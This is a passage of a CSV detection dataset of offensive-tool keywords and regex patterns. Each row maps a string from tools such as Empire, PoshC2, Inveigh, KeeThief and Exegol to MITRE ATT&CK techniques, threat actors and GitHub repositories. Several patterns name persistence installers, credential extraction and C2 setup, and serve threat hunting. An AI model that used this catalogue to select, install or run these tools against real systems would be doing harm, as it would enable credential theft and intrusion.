tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48691" "*install_roastinthemiddle*",".{0,1000}install_roastinthemiddle.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48692" "*install_ruler*",".{0,1000}install_ruler.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48693" "*install_rusthound*",".{0,1000}install_rusthound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48694" "*install_shadowcoerce*",".{0,1000}install_shadowcoerce.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48695" "*install_smartbrute*",".{0,1000}install_smartbrute.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48696" "*install_smbmap*",".{0,1000}install_smbmap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48697" "*install_smtp-user-enum*",".{0,1000}install_smtp\-user\-enum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48698" "*install_sprayhound*",".{0,1000}install_sprayhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48699" "*install_targetedKerberoast*",".{0,1000}install_targetedKerberoast.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48700" "*install_webclientservicescanner*",".{0,1000}install_webclientservicescanner.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48701" "*install_windapsearch-go*",".{0,1000}install_windapsearch\-go.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48702" "*install_winrar_wine32.exe*",".{0,1000}install_winrar_wine32\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource 
Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48703" "*install_winrar_wine64.*",".{0,1000}install_winrar_wine64\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48704" "*install_zerologon*",".{0,1000}install_zerologon.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48705" "*installexe-persistence*",".{0,1000}installexe\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48707" "*Installing DHCP server and 
net-tools*",".{0,1000}Installing\sDHCP\sserver\sand\snet\-tools.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","48708" "*Installing systemwide remote access permanentally*",".{0,1000}Installing\ssystemwide\sremote\saccess\spermanentally.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","48709" "*Install-Module -Name DSInternals*",".{0,1000}Install\-Module\s\-Name\sDSInternals.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","48712" "*Install-Module -Name Invoke-ArgFuscator*",".{0,1000}Install\-Module\s\-Name\sInvoke\-ArgFuscator.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","48713" "*Install-Module -Name PSnmap -Scope *",".{0,1000}Install\-Module\s\-Name\sPSnmap\s\-Scope\s.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap 
like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","48714" "*Install-Module ps2exe*",".{0,1000}Install\-Module\sps2exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","48715" "*install-persistence*",".{0,1000}install\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48716" "*install-persistence-cron*",".{0,1000}install\-persistence\-cron.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - 
TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48717" "*Install-ServiceBinary*",".{0,1000}Install\-ServiceBinary.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48720" "*Install-SQLC2AgentLink*",".{0,1000}Install\-SQLC2AgentLink.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","48721" "*Install-SQLC2Server*",".{0,1000}Install\-SQLC2Server.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","48722" "*Install-SSP -Path*.dll*",".{0,1000}Install\-SSP\s\-Path.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - 
HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Install-SSP.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48724" "*Install-SSP.ps1*",".{0,1000}Install\-SSP\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1116","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48725" "*install-tor2web.sh*",".{0,1000}install\-tor2web\.sh.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","48726" "*int PotatoAPI::findNTLMBytes*",".{0,1000}int\sPotatoAPI\:\:findNTLMBytes.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","48729" "*Intercepter-NG*",".{0,1000}Intercepter\-NG.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48735" "*Intercepter-NG-1.0.zip*",".{0,1000}Intercepter\-NG\-1\.0\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48736" "*Intercepter-NG-1.3.zip*",".{0,1000}Intercepter\-NG\-1\.3\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48737" "*Interesting? 
there are multiple .NET runtimes loaded in KeePass*",".{0,1000}Interesting?\sthere\sare\smultiple\s\.NET\sruntimes\sloaded\sin\sKeePass.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","48738" "*--interface * --wpad --lm --disable-ess*",".{0,1000}\-\-interface\s.{0,1000}\s\-\-wpad\s\-\-lm\s\-\-disable\-ess.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48739" "*Internal-Monologue.exe*",".{0,1000}Internal\-Monologue\.exe.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","N/A","10","1512","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z","48740" "*InternalMonologueDll*",".{0,1000}InternalMonologueDll.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","N/A","10","1512","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z","48741" 
"*InternalMonologueExe*",".{0,1000}InternalMonologueExe.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","N/A","10","1512","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z","48742" "*IntruderPayloadGeneratorFactory.class*",".{0,1000}IntruderPayloadGeneratorFactory\.class.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","48744" "*IntruderPayloadProcessor.class*",".{0,1000}IntruderPayloadProcessor\.class.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","48745" "*IntruderPayloads*",".{0,1000}IntruderPayloads.{0,1000}","offensive_tool_keyword","IntruderPayloads","A collection of Burpsuite Intruder payloads. BurpBounty payloads (https://github.com/wagiro/BurpBounty). fuzz lists and pentesting methodologies. To pull down all 3rd party repos. 
run install.sh in the same directory of the IntruderPayloads folder.","T1101 - T1114 - T1324 - T1559","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/1N3/IntruderPayloads","1","0","N/A","N/A","N/A","10","3779","1191","2021-09-27T01:47:05Z","2015-10-29T14:57:06Z","48746" "*-Inveigh *",".{0,1000}\-Inveigh\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48747" "*Inveigh Relay*",".{0,1000}Inveigh\sRelay.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48748" "*Inveigh.exe*",".{0,1000}Inveigh\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","48749" "*Inveigh.ps1*",".{0,1000}Inveigh\.ps1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48750" 